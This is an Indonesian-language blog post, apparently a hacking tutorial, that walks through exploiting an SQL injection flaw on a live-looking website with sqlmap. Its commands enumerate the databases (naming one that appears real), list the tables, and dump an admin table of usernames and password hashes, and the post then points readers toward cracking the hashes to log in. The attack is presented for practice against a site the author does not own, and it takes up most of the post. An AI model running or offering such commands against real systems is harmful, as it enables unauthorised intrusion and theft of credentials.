Haii broo apa kabar, baik kan :D
Setelah kemaren saya sharing tentang cek celah website dengan kali linux, dan ternyata site yg saya test tersebut mempunyai vuln sqli,yasudah bro lansung praktek aja ya
Pertama kita akan lihat dulu isi dari database situs tersebut
sqlmap.py -u www.sitetarget.com/display.php?catId=22 --dbs
Tunggu bentar hingga muncul database target
site tersebut terdapat 2 database
[*] information_schema
[*] wwwenkay_qEnkayDB
sekarang kita akan melihat isi tabel dari database wwwenkay_qEnkayDB
sqlmap.py -u www.sitetarget.com/display.php?catId=22 -D nama_database --tables
Tunggu hingga muncul tabel
dalam database tersebut terdapat 15 tabel,nah sekarang kita ingin melihat isi dari tabel admin
sqlmap.py -u www.sitetarget.com/display.php?catId=22 -D nama_database -T nama_tabel --dump
wah ternyata terdapat 3 user dan passwordnya berupa hash,untuk masuk ke dalam site tersebut kita harus decrypt dulu ,nah untuk cara decrypt password hash kalian bisa cari caranya di sini
blognya bagus gan tapi lagunya mengganggu
BalasHapus